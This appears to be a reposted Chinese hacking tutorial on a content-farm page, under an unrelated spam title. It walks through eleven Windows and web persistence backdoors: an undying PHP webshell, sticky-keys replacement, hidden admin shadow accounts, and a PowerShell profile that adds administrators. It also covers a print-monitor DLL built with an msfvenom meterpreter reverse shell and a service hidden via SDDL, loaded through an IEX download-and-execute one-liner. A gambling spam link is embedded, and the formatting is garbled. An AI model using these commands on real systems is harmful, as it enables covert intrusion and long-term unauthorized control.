怎么给网站添加代码只做鱼网站
news/
2025/10/6 17:02:28/
文章来源:
怎么给网站添加代码,只做鱼网站,影视网站视频接口怎么做,商城网站建设价格1.php 不死马权限维持
?php
ignore_user_abort(); //关掉浏览器#xff0c;PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval 5; // 每隔*秒运行
do {
$filename test.php;
if(file_exists($filename)) {
echo…1.php 不死马权限维持
?php
ignore_user_abort(); //关掉浏览器PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval 5; // 每隔*秒运行
do {
$filename test.php;
if(file_exists($filename)) {
echo xxx;
}
else {
$file fopen(test.php, w);
$txt ?php phpinfo();?\n;
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true)
?
效果 2.映像劫持技术
进入注册表 注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
在下面添加一项这里的命名与后续要触发的可执行文件程序文件名一致这里我新建了一个moon.exe
然后在moon.exe的右侧新建一个Debugger在输入值的栏目中填入你的后门绝对路径我这里以cmd.exe为例。 在桌面 修改一个文件的文件名为moon.exe 双击 即可触发 如果想写入后门 把 路径换成你后门地址即可
3.策略组脚本维持
输入gpedit.msc 打开组策略打开 windows设置 脚本 里面又关机和开机 在
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup
新建1.bat
echo off
systeminfo 1.txt
启动时 选择该脚本文件即可 重启后 4.shift后门
按着shift五下 会弹出 首先 更改sethc.exe拥有者 为administrator move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe 5.建立影子账号
通常在拿到服务器后会创建一个带$符号的账户因为在常规cmd下是无法查看到的。
net user moonsec$ 123456 /add
net localgroup administrators moonsec$ /add
net user 通过管理用户可查到用户 通过创建影子账户则可以完全解决这种问题。
打开注册表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User 3e9是moonsec$用户 1F4是超级管理员的值
将1F4下F项的值复制到3e9下F项里面替换原有数据。然后导出moonsec$以及3e9。 删除 ner user moonsec$ /del 删除这个用户 再导入注册表 可以看到 用户已经不现实在这个面板了 用moonsec$登录远程终端 6.powershell配置文件后门
Powershell配置文件其实就是一个powershell脚本他可以在每次运行powershell的时候自动运行所以可以通过向该文件写入自定义的语句用来长期维持权限。
依次输入以下命令查看当前是否存在配置文件
echo $profile
Test-path $profile 如果返回false则需要创建一个
New-Item -Path $profile -Type File –Force 然后写入命令这里我以创建一个用户为目标也可以写成反弹shell的因为之前测试过程中写入过数据所以这里我是三条内容。
1.bat内容
net user moon 123456 /add net localgroup administrators moon /add 这里的C:\1.bat是我的后门文件位置实战情况下各位需要按照实际文件路径来修改
$string Start-Process C:\1.bat
$string | Out-File -FilePath $profile -Append
more $profile 重新打开powershell就会自动执行 7.Monitor 权限维持
项目地址 GitHub - Al1ex/Monitor: A old way to Persistence
项目使用
Step1下载该项目之后使用VS编译Monitor.cpp当然也可以使用编译好的Monitor.cpp代码如下所示
#include Windows.h
int main() {
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] TEXT(Windows x64);
TCHAR name[12] TEXT(Monitor);
TCHAR dll[12] TEXT(test.dll);
monitorInfo.pName name;
monitorInfo.pEnvironment env;
monitorInfo.pDLLName dll;
AddMonitor(NULL, 2, (LPBYTE)monitorInfo);
return 0;
} pName //监视器名称 pEnvironment //环境架构 pDLLName //监视器DLL文件的名称
Step 2使用Msfvenom生成dll攻击载荷
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.1.53 LPORT4444 -f
dll test.dll Step 3将shell.dll复制到目标主机的system32目录下之后重命名为test.dll(也就是上面的PDLLName你也可以自己修改为自己喜欢的总之随意)
copy C:\Users\Administrator\Desktop\test.dll C:\Windows\System32\test.dll Step 4之后进入system32目录并执行以下命(Monitors.exe为之前编译好的文件也需要放置到system32目录下) Step 5之后成功接收到Meterpreter会话 持久化实现
为了实现持久性我们需要在Monitors注册表位置下设置一个key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
之后在命令行下执行以下命令创建一个注册表项该注册表项将包含值test.dll从编辑器中查看注册表验证密钥是否已创建
reg add hklm\system\currentcontrolset\control\print\monitors\Pentestlab /v Driver /d test.dll /t REG_SZ 下次重新启动时spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件
下图演示了Meterpreter会话已建立与Print Spooler服务(SYSTEM)相同级别的特权并且已从System32文件夹执行了 8.利用安全描述符隐藏服务后门进行权限维持
1 先cs上线 2 通过注册服务创建后门
将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法通常可以通过sc或者powershell
来进行创建。cmd创建自启动服务
sc create .NET CLR Networking 3.5.0.0 binpath cmd.exe /k C:\Users\administrator\beacon.exe depend Tcpip obj Localsystem start auto 通过修改SDDL(安全描述符)隐藏服务
众所周知windows访问控制模型分为两部分 access token(访问令牌) 安全描述符
安全描述符包含与安全对象关联的安全信息。安全描述符包含安全描述符结构及其关联的安全信息。安 全描述符可以包含以下安全信息 对象的所有者和主要组的 Sid安全标识符 用于指定允许或拒绝特定用户或组的访问权限的 DACL 。 指定为对象生成审核记录的访问尝试类型的 SACL 。 一组限制安全描述符或其各个成员的含义的控制位。
windows中的安全对象都使用SDDL字符串来表示访问对象对于安全对象的权限服务自然也存在其SDDL并且sc命令中可以设置SDDL。那么通过更改SDDL可以修改服务的各种权限来隐藏服务
sc sdset .NET CLR Networking 3.5.0.0 D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) 然后通过sc与get-server查找服务均无结果
sc query |findstr .NET CLR Networking 3.5.0.0
get-service | findstr .NET CLR Networking 3.5.0.0 在知道服务名的前提下查询会显示拒绝访问
sc query .NET CLR Networking 3.5.0.0 但这样做有一个问题在注册表中很容易看到异常value。HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking 3.5.0.0 修改注册表ACL
我们可以通过修改注册表的DACL来拒绝对值的查询达到隐藏异常值的效果。这里给出一个通过
powershell修改注册表项的访问权限的简单脚本
在1.ps1脚本
function Server-Sddl-Change{
[CmdletBinding()]
param
(
[parameter(Mandatory$false)][String]$Name
)
$ROOT HKLM:\SYSTEM\CurrentControlSet\Services\
$S $ROOT$NAME
$acl Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person [System.Security.Principal.NTAccount]Everyone
$access [System.Security.AccessControl.RegistryRights]QueryValues
$inheritance [System.Security.AccessControl.InheritanceFlags]None
$propagation [System.Security.AccessControl.PropagationFlags]None
$type [System.Security.AccessControl.AccessControlType]Deny
$rule New-Object System.Security.AccessControl.RegistryAccessRule(
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person [System.Security.Principal.NTAccount]Everyone
$access
[System.Security.AccessControl.RegistryRights]SetValue,CreateSubKey,EnumerateSu
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang
ePermissions,TakeOwnership
$inheritance [System.Security.AccessControl.InheritanceFlags]None
$propagation [System.Security.AccessControl.PropagationFlags]None
$type [System.Security.AccessControl.AccessControlType]Allow
$rule New-Object System.Security.AccessControl.RegistryAccessRule(
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
}
在kali上启动http服务
python -m http.server 81 远程加载powershell脚本
powershell.exe -exec bypass -nop -w hidden -c IEX((new-object net.webclient).downloadstring(http://192.168.1.52:81/1.ps1));Server-Sddl-Change - Name .NET CLR Networking 3.5.0.0.NET CLR Networking 3.5.0.0 改成你的服务名
从下图可见已将值从该服务项中隐藏 我这里不知什么原因没有隐藏
重启计算机 获取后门 9.iis后门
web服务器上一般都 支持net 所以可以考虑利用net iis做一个后门
项目地址 GitHub - WBGlIl/IIS_backdoor: backdoor
1 新建web服务器
选择web服务器和应用程序服务器 点击下一步 点击下一步 勾选iis管理控制台 点击下一步 勾选web服务器(IIS)支持 选择安装 再次安装 剩下就是下一步以及安装查看IP地址 有浏览器访问 在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面
新建 web.config 或者在原有的文件上添加 内容 打开 IIS_backdoor_shell 把网址填写进去即可 10.window 隐藏技术
使用Attrib s a h r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
这样就做到了真正的隐藏不管你是否显示隐藏文件此文件夹都看不见
Attrib s a h r 1.php 这样算是隐藏 其实还有查看方法 11.驱动级文件隐藏
Attrib s a h r 1.php驱动隐藏最典型的现象就是系统盘中存在以下文件
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
驱动隐藏我们可以用过一些软件来实现软件名字叫Easy File Locker 下载链接 GOPAY303 : SITUS GACOR TERBARU GAMPANG JAKCPOT DAFTAR PAKAI LINK GACOR GOPAY303
一般做黑链的小朋友都会这样设置只勾选可读其他的一律拒绝……那么会有这样的效果该文件不会显示不能通过列目录列出来也不能删除除非你知道完整路径你才可以读取文件内容。并且该软件还可以设置密码启动、修改设置、卸载及重复安装的时候都需要密码更蛋疼的是主界面、卸载程序等都可以删除只留下核心的驱动文件就行了。
如何清除
1、查询服务状态 sc qc xlkfs
2、停止服务 net stop xlkfs 服务停止以后经驱动级隐藏的文件即可显现
3、删除服务 sc delete xlkfs
4、删除系统目录下面的文件重启系统确认服务已经被清理了
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/929529.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!